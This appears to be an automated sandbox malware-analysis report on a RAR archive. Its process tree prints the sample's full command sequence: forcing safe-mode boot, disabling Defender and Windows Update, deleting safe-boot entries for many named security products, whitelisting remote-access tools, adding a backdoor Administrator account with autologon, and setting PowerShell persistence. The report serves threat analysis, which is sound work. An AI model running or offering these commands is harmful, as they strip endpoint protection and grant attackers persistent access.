Analysis
-
max time kernel
396s -
max time network
398s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
23/03/2023, 08:45
Errors
Reason
Machine shutdown
General
-
Target
win_11 (1).rar
-
Size
4.4MB
-
MD5
c45ac6a17c9cd7fbd7c2718d10d10f5b
-
SHA1
2311946a6a12cf4d5f754ee409ecb56d3b9ac622
-
SHA256
e35d0e2d9e40cc9047e8428e5ca5f81ea164309cceaab678b13557321706c711
-
SHA512
f8affe3f6bf71a09297ec7d02629bfb81851aeb59dd5ab39310abb0aa3b3aac514d52da24717a63255c537fc5e615fd593016731f4769c6e9c5cc9728727656c
-
SSDEEP
98304:PhzBHesp/tbw5J5D3302MaIwqI4u09abw23QHB+x6aSNij3ybwVhlN:PhzBesxi5rlMaIgSHB+chWrJ
Score
9/10
Malware Config
Signatures
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
-
Creates new service(s) 1 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 15 IoCs
-
Modifies registry class 64 IoCs
-
Modifies registry key 1 TTPs 33 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 25 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\win_11 (1).rar"1⤵
- Modifies registry class
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" "C:\Users\Admin\AppData\Local\Temp\win_11 (1).rar"2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\win_11 (1)\" -spe -an -ai#7zMap4182:78:7zEvent125091⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\win_11 (1)\1.bat1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "C:\Users\Admin\Desktop\win_11 (1)\AAA.ps1"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\win_11 (1)\1.bat" "1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} safeboot network2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} safeboot network2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\net.exenet stop wuauserv2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wuauserv3⤵
-
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled2⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SAVService /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SAVAdminService /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Sophos File Scanner Service" /f2⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ekrnEpfw" /f2⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EHttpSrv" /f2⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ekrn" /f2⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CSFalconService" /f2⤵
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SentinelAgent /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SentinelStaticEngine /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon /v legalnoticecaption /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon /v legalnoticetext /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SepLpsService /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sepWscSvc /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBEndpointAgent /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CylanceSvc /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SepMasterService /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CbDefense /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CbDefenseWSC /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EPProtectedService /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\epredline /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EPSecurityService /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EPUpdateService /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EPIntegrationService /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TmCCSF /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TmWSCSvc /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AnyDeskMSI /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AnyDeskMSI /t REG_SZ /d Service /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AnyDesk /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AnyDesk /t REG_SZ /d Service /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tvnserver /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tvnserver /t REG_SZ /d Service /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ekrnEpfwFF /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ekrnEpfwFF /t REG_SZ /d Service /f2⤵
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d Administrator /f2⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d Password123! /f2⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f2⤵
-
-
C:\Windows\system32\sc.exesc create ekrnEpfwFF binpath= "cmd /c powershell -exec bypass -w 1 -file c:\programdata\AAA.ps1" start= auto type= own type= interact2⤵
- Launches sc.exe
-
-
C:\Windows\system32\net.exenet user Administrator Password123! /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Administrator Password123! /add3⤵
-
-
-
C:\Windows\system32\net.exenet localgroup ╨É╨┤╨╝╨╕╨╜╨╕╤ü╤é╤Ç╨░╤é╨╛╤Ç╤ï Administrator /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup ╨É╨┤╨╝╨╕╨╜╨╕╤ü╤é╤Ç╨░╤é╨╛╤Ç╤ï Administrator /add3⤵
-
-
-
C:\Windows\system32\net.exenet user Administrator Password123!2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Administrator Password123!3⤵
-
-
-
C:\Windows\system32\net.exenet user Administrator /Active:Y2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Administrator /Active:Y3⤵
-
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v *a /t REG_SZ /d "cmd.exe /c powershell -exec bypass -w 1 -file c:\programdata\AAA.ps1& bcdedit /deletevalue {default} safeboot& shutdown -r -t 0" /f2⤵
- Adds Run key to start application
- Modifies registry key
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v *a /t REG_SZ /d "cmd.exe /c powershell -exec bypass -w 1 -file c:\programdata\AAA.ps1& bcdedit /deletevalue {default} safeboot& shutdown -r -t 0" /f2⤵
- Adds Run key to start application
- Modifies registry key
-
-
C:\Windows\system32\shutdown.exeshutdown /r /f /t 02⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\shutdown.exeshutdown /r /f /t 02⤵
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa392d855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
28KB
MD537317d5e31ff4ce8a42e04ef3cb333c2
SHA12eb13b083e787e232bf04c21467a7ca93aa97880
SHA25657a2de29a53011f56e5fbe404a213895241c03c6154c9fe565daec14ae324857
SHA512cd876c8132df9f6759d382ef360759497fa5e9bb7b3e7fcb28b791d77edb16fcc0f9045df798de79969337a29a73ce5ec5970e87a761457994ba6f5fc0b99d79
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5bee9d958a37b5dc12988aee82cd9d6e9
SHA14baec12524a5af1e2a1e696933108e93cf95576a
SHA25673ad30fa2636cb28d10471c571dc33b9f9d129398c6878223a75c5daa09078ef
SHA512333192559aeeed0eeef98f104ef4817a1dc2c815c94bd4371389885129bcd0d8bb2ddf86d65d79b095d9bbcbc9360d95f2db130d03ee626d440f68e48d65bc84
-
Filesize
1.2MB
MD52c366731eae3ca43c8285cbc3c6d0275
SHA187c1aff3521300e522dc66be7eb7dcae115382c3
SHA2565cb41a3f9bd84f6d66e88f19c13ddd2b69df8195a2161bbade77d49571cbaae6
SHA512105e71680c5fe0e2d621abfc02d029b732c04e40262c28ec34e3d80d3ea19b22e3685a3323bdad8b5d093c3265a56203cddd3395bf005c59502499435101c5f0
-
Filesize
64KB
-
Filesize
32KB
-
Filesize
56KB
-
Filesize
224KB
-
Filesize
32KB
-
Filesize
296KB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
32KB
-
Filesize
224KB
-
Filesize
32KB
-
Filesize
152KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB